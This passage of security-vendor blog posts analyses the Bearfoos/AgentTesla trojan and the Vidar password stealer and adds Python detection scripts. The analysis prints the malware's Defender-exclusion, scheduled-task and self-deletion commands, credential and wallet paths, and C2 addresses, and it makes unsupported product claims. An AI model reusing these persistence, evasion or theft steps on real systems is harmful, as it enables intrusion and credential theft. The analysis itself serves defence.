Once the data is collected, the malware transmits it to a command-and-control server, then enters a dormant state, waiting for further commands. This allows it to remain undetected for extended periods. In addition to data theft, Bearfoos can log keystrokes, take screenshots, record video or audio using the system’s peripherals, and perform other spying activities.

Trojan:Win32/Bearfoos.B!ml spreads using methods typical for this type of malware. Most commonly, it is distributed through game cheats, mods, and dubious utilities. The second most common method of distribution is email spam.

Technical Analysis

Let’s break down how Trojan:Win32/Bearfoos.B!ml behaves in an infected system. The particular sample that I review appears to be an offshoot of AgentTesla spyware. I’ll try to explain the most important aspects of this threat as clearly as possible.

Upon infiltrating the system, the malware performs checks in the following locations for the presence of sandboxes and debuggers. This is a typical step that malware does to avoid analysis and “useless” infections.

C:\drivers\etc\hosts
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\system32\VERSION.dll

Gaining Persistence

After that, it drops its own copy to the AppData/Roaming folder and assigns it a random name. In my case, it was vzCravLx.exe. Next, the malware checks Microsoft Defender settings:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiVirus

These registry values pertain to various components of the system’s anti-malware protection settings. The malware checks them to understand the system’s security posture and plan further actions. In our scenario, where the Defender settings had not been altered from their defaults, Bearfoos proceeded to modify Defender itself. It executes the following commands:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\\AppData\Roaming\vzCravLx.exe"
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vzCravLx" /XML "C:\Users\\AppData\Local\Temp\tmp6EAE.tmp"

This is what gives the malware persistence. With the first command, it excludes the path to its own executable from Microsoft Defender scanning. The second command creates a task in Task Scheduler that runs the malware periodically. After that, Bearfoos, a.k.a. AgentTesla, deletes the original file and keeps operating only through these protected duplicates.
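To catch this kind of tampering from process-creation telemetry, here is an added example (not the sample’s own code nor GridinSoft’s): a small Python triage rule that flags a Defender exclusion or a scheduled-task definition pointing into a user profile. The log lines it runs over are constructed, with "victim" standing in for the user name the article elides.

```python
"""Triage rule for the persistence technique described above.

Added example for this article; it is not code from the analysed sample
nor from GridinSoft. It scans process-creation command lines (for instance
the CommandLine field of Sysmon Event ID 1 or Windows Security Event 4688)
for two behaviours: a Microsoft Defender exclusion added for a path under a
user profile, and a scheduled task created from an XML definition stored in
a temp folder. The log lines below are constructed; "victim" stands in for
the user name the article elides.
"""
import re

# Locations under a user profile that an ordinary installer rarely needs to
# exclude from scanning or to keep a scheduled task definition in.
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]*\\appdata\\(?:roaming|local\\temp)\\", re.IGNORECASE)

# Add-MpPreference -ExclusionPath <path>   (quotes optional; path ends the line)
# Adding an exclusion only succeeds from an elevated PowerShell, so a hit
# also tells you the process already ran with administrative rights.
EXCLUSION_RE = re.compile(
    r"add-mppreference\s+-exclusionpath\s+\"?([^\"]+?)\"?\s*$", re.IGNORECASE)

# schtasks /Create ... /XML <file>
SCHTASKS_RE = re.compile(
    r"schtasks(?:\.exe)?\"?\s+/create\b.*?/xml\s+\"?([^\"]+?)\"?\s*$", re.IGNORECASE)


def check_command_line(cmdline: str) -> list[tuple[str, str]]:
    """Return (rule_name, offending_path) pairs for one command line."""
    findings = []
    m = EXCLUSION_RE.search(cmdline)
    if m and USER_WRITABLE.search(m.group(1)):
        findings.append(("defender_exclusion_in_user_profile", m.group(1)))
    m = SCHTASKS_RE.search(cmdline)
    if m and USER_WRITABLE.search(m.group(1)):
        findings.append(("schtasks_xml_from_temp", m.group(1)))
    return findings


def scan_log(lines: list[str]) -> list[tuple[int, str, str]]:
    """Run the rules over a list of command lines; returns (line_no, rule, path)."""
    results = []
    for idx, line in enumerate(lines, start=1):
        for rule, path in check_command_line(line):
            results.append((idx, rule, path))
    return results


# Constructed sample: the two commands from the article with a placeholder
# user name, plus two benign administrative commands that must not trigger.
SAMPLE_LOG = [
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'Add-MpPreference -ExclusionPath "C:\Users\victim\AppData\Roaming\vzCravLx.exe"',
    r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vzCravLx" '
    r'/XML "C:\Users\victim\AppData\Local\Temp\tmp6EAE.tmp"',
    r'powershell.exe Add-MpPreference -ExclusionPath "C:\Program Files\Vendor"',
    r'schtasks.exe /Create /TN "Vendor\Backup" /XML "C:\ProgramData\Vendor\task.xml"',
]

if __name__ == "__main__":
    for line_no, rule, path in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {rule} -> {path}")
```

A hit on the first rule is worth correlating with Get-MpPreference output on the host, since the exclusion persists after the process exits.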

Data Collection

The next phase involves the collection of sensitive information. First of all, the malware checks a selection of files that belong to web browsers, looking for passwords, cookies and session tokens. Here is the list of browsers in question:

  • 360Chrome
  • Microsoft Edge
  • 7Star
  • Amigo
  • Brave Browser
  • Citrio
  • CentBrowser
  • Chedot
  • Chromium
  • Orbitum
  • CocCoc Browser
  • Comodo Dragon
  • Coowon
  • Elements Browser
  • Epic Privacy Browser
  • Sleipnir5 (Fenrir Inc)
  • Iridium
  • Kometa
  • ChromePlus (MapleStudio)

As we can see, these locations mainly consist of user data from Chromium-based web browsers. Aside from them, the malware harvests credentials from desktop email clients and some FTP/VPN applications.

Command & Control Server

The Bearfoos trojan sends HTTP requests to the following addresses to download various files, including a CAB file from the Windows Update server and certificates from Sectigo and Microsoft:

GET http://download.windowsupdate.com/d/msdownload/update/others/2015/05/17930914_a3b333eff1f0428f5a2c87724c542504821cdbd8.cab
GET http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt 200
GET http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c 200
GET http://www.microsoft.com/pki/certs/MicCodSigPCA_08-31-2010.crt 200
GET http://www.microsoft.com/pki/certs/MicrosoftTimeStampPCA.crt 200

These requests might be attempts to disguise malicious activity as legitimate actions. The malware also resolves DNS names for several domains, including the legitimate download.windowsupdate.com, and potentially suspicious domains such as mail.commtechtrading[.]com and chir104.websitehostserver[.]net. These latter domains could be part of its command-and-control (C2) infrastructure used for data exfiltration. The malware also establishes a number of TCP and UDP connections to various IP addresses.

After completing the data exfiltration, the malware enters a waiting mode, listening for commands from the C2 server. During this standby period, it continues to collect data, capturing keystrokes, taking screenshots, and recording audio and video from peripheral devices.

Is Trojan:Win32/Bearfoos.B!ml a False Positive?

As I mentioned earlier, the detection of Trojan:Win32/Bearfoos.B!ml is performed by Microsoft Defender’s AI-based system. However, this method is prone to false positives, and legitimate files, such as those associated with recently updated games or programs, are often mistakenly flagged as malicious. In particular, false positives are common with small-batch programs from GitHub, certain emulator apps, and in some bizarre cases even Windows’ own files.

While it is easy to spot a false positive with a program that you know and trust, doing so with a less familiar app may be problematic. If you are not sure about the source and developer, bold guessing may be a particularly destructive practice. That is why a second opinion anti-malware scan is needed.

How to Remove Trojan:Win32/Bearfoos.B!ml?

To remove the Bearfoos.B!ml trojan or check whether it is a real detection, I recommend using GridinSoft Anti-Malware. Unlike Microsoft Defender, this program is not vulnerable to malware attacks, and it will easily spot even the most recent malware samples thanks to its multi-component detection system. Follow the guide below to get your system as good as new.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. You can adjust the action the program takes on each element: click "Advanced mode" and see the options in the drop-down menus. You can also view extended information about each detection: malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are many detections. Do not interrupt it, and you will get your system as clean as new.

Removal finished

Password Stealer https://gridinsoft.com/blogs/password-stealer/ Tue, 28 May 2024 11:04:42 +0000

The post Password Stealer appeared first on Gridinsoft Blog.

A password stealer is a type of data-stealing malware that targets a specific category of information. Such stealers are often spread through phishing, malvertising, and sometimes cracked software. Let’s take a more detailed look at how they work and how to protect yourself against password stealers.

What Is a Password Stealer?

As its name suggests, password stealer is a type of malware that aims to steal sensitive data. Mainly, this is about credentials to email accounts, social networks, and online banking. But these days, quite a few password stealers incorporate more diverse functionality. They now target crypto wallets, cookies, browser cache and saved passwords, Discord session tokens, and more.

how password stealer works

The primary distribution method of password stealers is phishing emails with malicious attachments. Sometimes, however, password stealers can also be distributed via malicious ads in search results. In a selection of cases, spear phishing was used to attack a specific person with the malware.

Technical Analysis

All stealers are generally very similar, so the properties of the instance examined here apply to the others, perhaps with minimal differences. This will be a rather simplified analysis aimed at understanding how a password stealer works. I will go through the most common and important actions that this malware performs. For the test sample, I’ve chosen Vidar Stealer – a classic password stealer written in C++. The attack commonly begins when the victim runs an infected file.

Defense Evasion

Like most malware, it has a few tricks that make it particularly difficult to detect on the system. When the malware comes under the guise of the installer of a legitimate program, it can contain a row of null bytes at the beginning, which pushes its size over 700 MB. This size allows it to avoid instant detection by antivirus solutions and online checkers like VirusTotal. Another trick aimed at evading detection is code obfuscation. The malware also checks system parameters to ensure it is not running in a virtualized environment. It checks values such as:

HKLM/System/Setup
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

These keys contain information about the system and hardware, which lets the malware identify the machine and build a digital fingerprint of the infected system.
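The null-byte padding mentioned under Defense Evasion can be screened for without loading a 700 MB file into memory. The following Python, added here as an example rather than taken from Vidar or from GridinSoft, streams a file in chunks and reports the longest run of null bytes relative to the file size; the thresholds and sample buffers are constructed.

```python
"""Screen a binary for the null-byte inflation trick described above.

Added example for this article; it is not code from Vidar or from GridinSoft.
The scanner streams the file in chunks, tracks the longest run of 0x00 bytes
across chunk boundaries and relates it to the file size. Ordinary executables
also contain null runs (section alignment, zeroed data), so the verdict needs
both an absolute and a relative threshold. Thresholds and sample buffers are
constructed for this example.
"""
import io
import re

NON_NULL = re.compile(rb"[^\x00]+")


def longest_null_run(source, chunk_size: int = 1 << 20) -> tuple[int, int]:
    """Return (longest run of null bytes, total bytes) for a stream or bytes."""
    stream = io.BytesIO(source) if isinstance(source, (bytes, bytearray)) else source
    longest = current = total = 0
    while True:
        chunk = stream.read(chunk_size)
        if not chunk:
            break
        total += len(chunk)
        # Splitting on non-null bytes leaves only the null runs. The first
        # piece continues the run carried over from the previous chunk; the
        # last piece is carried into the next chunk.
        pieces = NON_NULL.split(chunk)
        current += len(pieces[0])
        if len(pieces) > 1:
            longest = max(longest, current, *map(len, pieces[1:-1]))
            current = len(pieces[-1])
        longest = max(longest, current)
    return longest, total


def inflation_report(source, min_run: int = 1 << 20, min_ratio: float = 0.5) -> dict:
    """Flag a file whose single largest null run is both large and most of the file."""
    longest, total = longest_null_run(source)
    ratio = longest / total if total else 0.0
    return {
        "size": total,
        "longest_null_run": longest,
        "null_ratio": round(ratio, 3),
        "inflated": longest >= min_run and ratio >= min_ratio,
    }


# Constructed samples: a fake header followed by 2 MiB of padding, and a
# "normal" binary whose only null runs are small, alignment-sized gaps.
PADDED_SAMPLE = b"MZ" + bytes(range(256)) * 16 + b"\x00" * (2 * 1024 * 1024) + b"END"
NORMAL_SAMPLE = (bytes(range(1, 256)) * 64 + b"\x00" * 512) * 8

if __name__ == "__main__":
    for name, data in (("padded", PADDED_SAMPLE), ("normal", NORMAL_SAMPLE)):
        print(name, inflation_report(data))
```

On a real file, pass an open binary handle: inflation_report(open(path, "rb")). Treat a hit as a triage signal only, since some legitimate installers embed large zero-filled resources.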

Data Collection

Once the malware is convinced that it is not running in a sandbox and has established a foothold in the system, it moves on to its primary function – information gathering. The password stealer collects the following information from browsers:

C:\Users\admin\AppData\Local\Temp\History\History.IE5\index.dat
C:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.dat
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
C:\Windows\system32\CRYPTBASE.dll
C:\Documents and Settings\\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004
C:\Users\user\AppData\Local\Google\Chrome\User Data\

These folders contain information such as autofill data, saved passwords, cookies, cache, and browser extensions. Next, the stealer tries to collect crypto wallet data by checking the locations listed below. The list includes only a few wallets, as the full list is too long to reproduce.

C:\Users\user\AppData\Local\Blockstream\Green\wallets\
C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\

Data Exfiltration

The malware’s final operation step is exfiltration of the stolen data. To do this, the password stealer communicates with a C2 (Command and Control) server to receive further instructions. There are various options for communicating with C2: attackers often still use classic C2 servers, and sometimes they use Telegram or Mastodon as intermediate servers. In our case, however, the malware uses Steam. Before sending the stolen data, the stealer sends several requests, including:

GET https://steamcommunity.com/profiles/76561199548518734 200

This is a link to a Steam profile. However, the profile’s strange name, “sppmon http://195.201.131.165|”, is a command for the malware: it is the address of the final server that the stealer should connect to. The phrase “This user has also played as” suggests that the address in the name changes quite often.

Steam profile as intermediate server

When finished, the stealer deletes itself and covers its tracks. Not all infostealers do this; some prefer to stay in the system even after extracting all the data. But when they do, a shell command like this comes in handy:

"%ComSpec%" /c taskkill /im "%SAMPLENAME%" /f & erase "%SAMPLEPATH%" & exit

Difference Between Password Stealer and Spyware

Password stealers and spyware may look similar, but have some fundamental differences. The first difference lies in the principle of operation: stealer works quietly and quickly, often sticking to “steal and leave” tactics. Spyware, on the other hand, aims at a long and permanent presence in the system. Although some stealers can take screenshots and capture keyboard inputs in addition to collecting sensitive data, this is not the main functionality.

Spyware, on the other hand, can stay on an infected system for months and continuously collect data. This includes screenshots, capturing keystrokes, and camera and microphone recordings. This data is sent periodically or in real-time to the attacker’s server.

Safety Recommendations

Malware, and password stealers in particular, tends to become more and more sophisticated. Getting harder to detect, picking new ways of spreading, collecting more and more data – all this makes them a menace to be aware of. Fortunately, the ways to keep this from getting onto your PC are not particularly hard.

  • Be careful with email attachments. This method is still the leading method among successful malware infections. Do not open attachments or click on links if the email has a suspicious sender or is not the email you were intentionally expecting.
  • Avoid cracked software. Pirated software is illegal in itself, but it carries serious risks. Attackers embed malicious code in “repacks”, as installing most hacked programs requires disabling security software.
  • Use security software. A reliable antimalware solution is essential because it can prevent malware from running and installing in case of user error, and it generally provides comprehensive protection by significantly reducing infection vectors. Advanced solutions such as GridinSoft Anti-Malware also have an Internet Security module that blocks potentially malicious sites.
